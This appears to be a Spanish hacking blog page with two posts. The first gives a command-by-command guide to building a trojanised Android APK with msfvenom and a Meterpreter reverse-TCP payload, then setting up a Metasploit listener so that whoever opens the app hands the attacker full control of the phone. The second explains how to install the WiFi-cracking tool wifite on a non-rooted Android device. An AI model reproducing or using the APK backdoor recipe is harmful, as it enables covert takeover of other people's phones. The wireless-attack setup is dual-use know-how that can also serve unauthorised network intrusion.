jueves, 1 de diciembre de 2016

Hackeando Android con Metasploit

Como sabéis estos dáis eh estado tocando mucho Android y me propuse a ver si podía vulnerar la seguridad de mi propio teléfono y así corregir los errores en el terminal y lo hice de la siguiente forma


Primero cree una apk infectada con Mestasploit tal que así

msfvenom -p android/meterpreter/reverse_tcp LHOST="IP" LPORT=444 > Nombredelarchivo.apk
Después solo deberemos activar el servicio con el comando:

service postgresql start
Y ahora entrar a la consola de Metasploit con:
msfconsole

Ahora activaremos el Payload con
set PAYLOAD android/meterpreter/reverse_tcp

Y pondremos nuestra ip local previamente comprovada con ifconfig
set LHOST "IP"

Y el puerto
set LPORT 444

Ya solo quedará activar el exploit y en cuanto alguien abra la app infectada tendremos control total de su teléfono
exploit

Y con eso habreamos accedido al teléfono android y tendremos total control

Aquí dejaré una serie de comandos útiles para cuando estemos dentro del terminal

--> COMANDOS

viernes, 25 de noviembre de 2016

Wifite en Android [NO ROOT]

Estos días he estado un poco desconectado en casa de mi pareja, simplemente he estado trasteando el móvil para ver que sacaba de nuevo y continuar algún proyecto que tenía en mente y he dado con una herramienta para poder emular un sistema simple de Linux en Android y me dispuse a jugar con las herramientas que nos ofrece esta aplicación, ahora explicaré con lo que me he podido encontrar y las limitaciones en cuanto no tener el móvil rooteado. 


Lo primero con lo que nos encontraremos será con una terminal simple con la cual podremos actualizar nuestro Linux (emulado en Android) para configurarlo lo único que deberemos hacer será descargar GNUroot del Play Store

--> GNUroot

Y nos encontraremos una pantalla como esta


Solo deberemos darle a Launch as Fake Root (previamente tendremos que tener instalado un Kernel en mi caso Whezzy) y nos mostrará un terminal


Ahora agregaremos repositorios de la distro que queramos utilizar, en nuestro caso Kali Linux (ya que esta máquina está basada en debian y nos dará facilidades a la hora de configurar herramientas de hacking que en definitiva es lo quye queremos para instalar wifite en nuestro dispositivo Android) para ello haremos lo típico; agregaremos repositorios utilizando nano con la siguiente linea de comandos
nano /etc/apt/sources.list
Y nos aparecerá el archivo de los repositorios

Ahora solo deberemos agregar a los repositorios las siguientes entradas
deb http://http.kali.org/kali kali-rolling main contrib non-free
deb-src http://http.kali.org/kali kali-rolling main contrib non-free
Y, a continuación como es típico
apt-get update
apt-get upgrade
Ya tendremos nuestros repositorios actualizados, ahora solo queda instalar la herramienta Wifite para ello necesitaremos instalar previamente las dependencias:
  • Aircrack-ng
  • Python 2.6.x o Python 2.7.x
  • Y wireless-tools
Para ello utilizaremos el tradicional
apt-get install aircrack-ng
apt-get install python
apt-get install wireless-tools
Solo quedará
apt-get install wifite
Pondremos en nuestro terminal
wifite
Y como podréis apreciar nuestro wifite estará configurado y funcionando


************************RECOMENDACIONES**************************

Recomiendo instalar Hacker's Keyboard por comodidad os dejaré el enlace aquí debajo

--> Hacker's Keyboard